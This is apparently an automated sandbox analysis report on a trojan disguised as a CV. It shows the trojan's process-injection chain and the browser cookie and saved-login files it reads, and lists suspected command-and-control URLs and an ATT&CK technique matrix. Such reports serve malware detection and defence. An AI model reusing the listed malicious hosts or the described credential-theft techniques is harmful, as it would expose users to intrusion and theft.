                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003BA66C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003C71FA
                Source: CV Lic H&S Olivetti Renzo.exe, DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A65C4 cpuid 0_2_003A65C4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_003D091D
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003FB340 GetUserNameW,0_2_003FB340
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003B1E8E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0039DDC0

                Stealing of Sensitive Information

                Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\winver.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\winver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_81
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_XP
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_XPe
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_VISTA
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_7
                Source: CV Lic H&S Olivetti Renzo.exe Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003D8C4F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003D923B
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1561733, Sample: CV Lic H&S Olivetti Renzo.exe, Startdate: 24/11/2024, Architecture: WINDOWS, Score: 100
                Process chain: CV Lic H&S Olivetti Renzo.exe started svchost.exe; svchost.exe injected DIRZUznVUfWlad.exe; DIRZUznVUfWlad.exe started winver.exe; winver.exe injected DIRZUznVUfWlad.exe and started firefox.exe

                Source | Detection | Scanner | Label | Link
                CV Lic H&S Olivetti Renzo.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject |
                CV Lic H&S Olivetti Renzo.exe | 73% | Virustotal | | Browse
                CV Lic H&S Olivetti Renzo.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                www.50food.com | 1% | Virustotal | | Browse
                                                    http://www.ytsd88.top/8qt7/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.zriaraem-skiry.sbs/f8c6/true
                                                    • Avira URL Cloud: safe
                                                    unknown
Name  Source  Malicious  Antivirus Detection  Reputation
IP  Domain  Country  Flag  ASN  ASN Name  Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561733
Start date and time: 2024-11-24 08:08:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CV Lic H&S Olivetti Renzo.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@19/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 54
• Number of non-executed functions: 296
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target DIRZUznVUfWlad.exe, PID 5728 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time  Type  Description
02:10:11  API Interceptor  9578973x Sleep call for process: winver.exe modified
Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.174.133
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 104.21.74.61
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.160.80
                                                                                      WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                      • 172.67.165.138
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.33.116
                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                      • 172.64.41.3
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 172.64.41.3
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\winver.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288256
                                                                                      Entropy (8bit):7.9954672308297035
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:4mRIJ4vP9faroXFTqDqrorz+8ajTlpIwgPojRFVac:gJIBarzkOz+/flpIwgg9
                                                                                      MD5:6190EBFC69C7BFB944DD2C9C4E04B14D
                                                                                      SHA1:C9B487C55555F0784FB0F792BF2CB34B357D109E
                                                                                      SHA-256:4569A96FAE14B683AA7084C0AFF8BED984331EF55E5AD914E014B7A3DC2198DF
                                                                                      SHA-512:0913A26147EE597E29B845ACE90AEDC1A68C9FCE4F42F35F9446DB2A6B6B49576F2621334519DFA526561881D82088E1D76CBCF49616D31E909E63365D077605
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.139764677509903
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CV Lic H&S Olivetti Renzo.exe
                                                                                      File size:1'207'808 bytes
                                                                                      MD5:dffcfc55dbe3596498888c48f569adcd
                                                                                      SHA1:0a75b7cdb8ded9722a7f2188777793c6c62a178b
                                                                                      SHA256:1dae087c41578f5a3a6ed11bbe54efa045598e2bdccf54db0315bbbe36fc1956
                                                                                      SHA512:a8932db72aa417c32c482fea159b0151cc2c15fe22e11977d755b829523400431018569cfe6f1ef949a235842d6d4edf3e8a5433b1c8601edc2e50f8056c18eb
                                                                                      SSDEEP:24576:Ztb20pkaCqT5TBWgNQ7aQ08vv9tUKJWpY9rcn6A:qVg5tQ7aQ0Oexpii5
                                                                                      TLSH:4745CF2373DD8360C3B25273BA65B711BEBF782506A1F86B2FD4093DE920122561E673
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x673F65C1 [Thu Nov 21 16:54:25 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                      Instruction
                                                                                      call 00007F25C45242AFh
                                                                                      jmp 00007F25C45172C4h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F25C451744Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F25C45177AEh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F25C4517449h
                                                                                      rep movsb
                                                                                      jmp 00007F25C451775Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F25C4517614h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F25C4517450h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F25C4517920h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F25C45175EDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F25C45175FEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F25C45175DDh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F25C451744Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F25C4517453h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F25C45174A5h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F25C45174F8h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5dc70 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5dc70 | 0x5de00 | 7a99ade470f8c91b109d9a5368318935 | False | 0.9296640937083888 | data | 7.898929417249416 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x54f77 | data | | | 1.000333311304138
RT_GROUP_ICON | 0x121730 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1217a8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1217bc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1217d0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1217e4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1218c0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, 